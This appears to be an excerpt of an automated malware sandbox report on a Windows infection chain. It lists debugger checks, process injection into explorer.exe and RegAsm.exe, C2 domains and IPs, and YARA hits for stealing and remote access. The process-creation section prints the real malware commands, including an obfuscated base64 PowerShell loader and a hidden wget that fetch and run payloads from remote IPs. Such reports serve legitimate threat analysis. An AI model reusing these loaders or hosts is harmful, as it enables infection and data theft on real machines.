Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04067E41 mov eax, dword ptr fs:[00000030h] 27_2_04067E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04067E41 mov eax, dword ptr fs:[00000030h] 27_2_04067E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0411AE44 mov eax, dword ptr fs:[00000030h] 27_2_0411AE44
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0411AE44 mov eax, dword ptr fs:[00000030h] 27_2_0411AE44
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406766D mov eax, dword ptr fs:[00000030h] 27_2_0406766D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407AE73 mov eax, dword ptr fs:[00000030h] 27_2_0407AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407AE73 mov eax, dword ptr fs:[00000030h] 27_2_0407AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407AE73 mov eax, dword ptr fs:[00000030h] 27_2_0407AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407AE73 mov eax, dword ptr fs:[00000030h] 27_2_0407AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407AE73 mov eax, dword ptr fs:[00000030h] 27_2_0407AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EFE87 mov eax, dword ptr fs:[00000030h] 27_2_040EFE87
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D46A7 mov eax, dword ptr fs:[00000030h] 27_2_040D46A7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04120EA5 mov eax, dword ptr fs:[00000030h] 27_2_04120EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04120EA5 mov eax, dword ptr fs:[00000030h] 27_2_04120EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04120EA5 mov eax, dword ptr fs:[00000030h] 27_2_04120EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04128ED6 mov eax, dword ptr fs:[00000030h] 27_2_04128ED6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040836CC mov eax, dword ptr fs:[00000030h] 27_2_040836CC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04098EC7 mov eax, dword ptr fs:[00000030h] 27_2_04098EC7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0410FEC0 mov eax, dword ptr fs:[00000030h] 27_2_0410FEC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040676E2 mov eax, dword ptr fs:[00000030h] 27_2_040676E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040816E0 mov ecx, dword ptr fs:[00000030h] 27_2_040816E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408A70E mov eax, dword ptr fs:[00000030h] 27_2_0408A70E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408A70E mov eax, dword ptr fs:[00000030h] 27_2_0408A70E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407F716 mov eax, dword ptr fs:[00000030h] 27_2_0407F716
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EFF10 mov eax, dword ptr fs:[00000030h] 27_2_040EFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EFF10 mov eax, dword ptr fs:[00000030h] 27_2_040EFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0412070D mov eax, dword ptr fs:[00000030h] 27_2_0412070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0412070D mov eax, dword ptr fs:[00000030h] 27_2_0412070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04054F2E mov eax, dword ptr fs:[00000030h] 27_2_04054F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04054F2E mov eax, dword ptr fs:[00000030h] 27_2_04054F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408E730 mov eax, dword ptr fs:[00000030h] 27_2_0408E730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407B73D mov eax, dword ptr fs:[00000030h] 27_2_0407B73D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407B73D mov eax, dword ptr fs:[00000030h] 27_2_0407B73D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406EF40 mov eax, dword ptr fs:[00000030h] 27_2_0406EF40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406FF60 mov eax, dword ptr fs:[00000030h] 27_2_0406FF60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04128F6A mov eax, dword ptr fs:[00000030h] 27_2_04128F6A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04068794 mov eax, dword ptr fs:[00000030h] 27_2_04068794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D7794 mov eax, dword ptr fs:[00000030h] 27_2_040D7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D7794 mov eax, dword ptr fs:[00000030h] 27_2_040D7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D7794 mov eax, dword ptr fs:[00000030h] 27_2_040D7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040937F5 mov eax, dword ptr fs:[00000030h] 27_2_040937F5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04124015 mov eax, dword ptr fs:[00000030h] 27_2_04124015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04124015 mov eax, dword ptr fs:[00000030h] 27_2_04124015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D7016 mov eax, dword ptr fs:[00000030h] 27_2_040D7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D7016 mov eax, dword ptr fs:[00000030h] 27_2_040D7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D7016 mov eax, dword ptr fs:[00000030h] 27_2_040D7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408002D mov eax, dword ptr fs:[00000030h] 27_2_0408002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408002D mov eax, dword ptr fs:[00000030h] 27_2_0408002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408002D mov eax, dword ptr fs:[00000030h] 27_2_0408002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408002D mov eax, dword ptr fs:[00000030h] 27_2_0408002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408002D mov eax, dword ptr fs:[00000030h] 27_2_0408002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406B02A mov eax, dword ptr fs:[00000030h] 27_2_0406B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406B02A mov eax, dword ptr fs:[00000030h] 27_2_0406B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406B02A mov eax, dword ptr fs:[00000030h] 27_2_0406B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406B02A mov eax, dword ptr fs:[00000030h] 27_2_0406B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407A830 mov eax, dword ptr fs:[00000030h] 27_2_0407A830
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407A830 mov eax, dword ptr fs:[00000030h] 27_2_0407A830
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407A830 mov eax, dword ptr fs:[00000030h] 27_2_0407A830
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407A830 mov eax, dword ptr fs:[00000030h] 27_2_0407A830
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04070050 mov eax, dword ptr fs:[00000030h] 27_2_04070050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04070050 mov eax, dword ptr fs:[00000030h] 27_2_04070050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04112073 mov eax, dword ptr fs:[00000030h] 27_2_04112073
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04121074 mov eax, dword ptr fs:[00000030h] 27_2_04121074
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04059080 mov eax, dword ptr fs:[00000030h] 27_2_04059080
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D3884 mov eax, dword ptr fs:[00000030h] 27_2_040D3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D3884 mov eax, dword ptr fs:[00000030h] 27_2_040D3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040990AF mov eax, dword ptr fs:[00000030h] 27_2_040990AF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040820A0 mov eax, dword ptr fs:[00000030h] 27_2_040820A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040820A0 mov eax, dword ptr fs:[00000030h] 27_2_040820A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040820A0 mov eax, dword ptr fs:[00000030h] 27_2_040820A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040820A0 mov eax, dword ptr fs:[00000030h] 27_2_040820A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040820A0 mov eax, dword ptr fs:[00000030h] 27_2_040820A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040820A0 mov eax, dword ptr fs:[00000030h] 27_2_040820A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408F0BF mov ecx, dword ptr fs:[00000030h] 27_2_0408F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408F0BF mov eax, dword ptr fs:[00000030h] 27_2_0408F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408F0BF mov eax, dword ptr fs:[00000030h] 27_2_0408F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EB8D0 mov eax, dword ptr fs:[00000030h] 27_2_040EB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EB8D0 mov ecx, dword ptr fs:[00000030h] 27_2_040EB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EB8D0 mov eax, dword ptr fs:[00000030h] 27_2_040EB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EB8D0 mov eax, dword ptr fs:[00000030h] 27_2_040EB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EB8D0 mov eax, dword ptr fs:[00000030h] 27_2_040EB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EB8D0 mov eax, dword ptr fs:[00000030h] 27_2_040EB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407B8E4 mov eax, dword ptr fs:[00000030h] 27_2_0407B8E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407B8E4 mov eax, dword ptr fs:[00000030h] 27_2_0407B8E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040540E1 mov eax, dword ptr fs:[00000030h] 27_2_040540E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040540E1 mov eax, dword ptr fs:[00000030h] 27_2_040540E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040540E1 mov eax, dword ptr fs:[00000030h] 27_2_040540E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040558EC mov eax, dword ptr fs:[00000030h] 27_2_040558EC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04059100 mov eax, dword ptr fs:[00000030h] 27_2_04059100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04059100 mov eax, dword ptr fs:[00000030h] 27_2_04059100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04059100 mov eax, dword ptr fs:[00000030h] 27_2_04059100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04074120 mov eax, dword ptr fs:[00000030h] 27_2_04074120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04074120 mov eax, dword ptr fs:[00000030h] 27_2_04074120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04074120 mov eax, dword ptr fs:[00000030h] 27_2_04074120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04074120 mov eax, dword ptr fs:[00000030h] 27_2_04074120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04074120 mov ecx, dword ptr fs:[00000030h] 27_2_04074120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408513A mov eax, dword ptr fs:[00000030h] 27_2_0408513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408513A mov eax, dword ptr fs:[00000030h] 27_2_0408513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407B944 mov eax, dword ptr fs:[00000030h] 27_2_0407B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407B944 mov eax, dword ptr fs:[00000030h] 27_2_0407B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405C962 mov eax, dword ptr fs:[00000030h] 27_2_0405C962
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405B171 mov eax, dword ptr fs:[00000030h] 27_2_0405B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405B171 mov eax, dword ptr fs:[00000030h] 27_2_0405B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407C182 mov eax, dword ptr fs:[00000030h] 27_2_0407C182
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408A185 mov eax, dword ptr fs:[00000030h] 27_2_0408A185
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04082990 mov eax, dword ptr fs:[00000030h] 27_2_04082990
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040861A0 mov eax, dword ptr fs:[00000030h] 27_2_040861A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D69A6 mov eax, dword ptr fs:[00000030h] 27_2_040D69A6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D51BE mov eax, dword ptr fs:[00000030h] 27_2_040D51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_041149A4 mov eax, dword ptr fs:[00000030h] 27_2_041149A4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040799BF mov ecx, dword ptr fs:[00000030h] 27_2_040799BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040799BF mov eax, dword ptr fs:[00000030h] 27_2_040799BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Code function: 6_2_043F14E2 LdrLoadDll, 6_2_043F14E2

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 199.34.228.47 80
Source: C:\Windows\explorer.exe Domain query: www.sushifactoryamphawa.com
Source: C:\Windows\explorer.exe Network Connect: 54.203.72.218 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.103 80
Source: C:\Windows\explorer.exe Domain query: www.choicearticleto-readtoday.info
Source: C:\Windows\explorer.exe Domain query: www.mgav21.xyz
Source: C:\Windows\explorer.exe Domain query: www.nexusbalance.com
Source: C:\Windows\explorer.exe Network Connect: 45.128.51.66 80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: C80000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 81F008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 3688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 6164
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 3688
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 6164
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 3504
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 4100
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm *.vbs,*.wsf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" C:\Windows\Temp\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY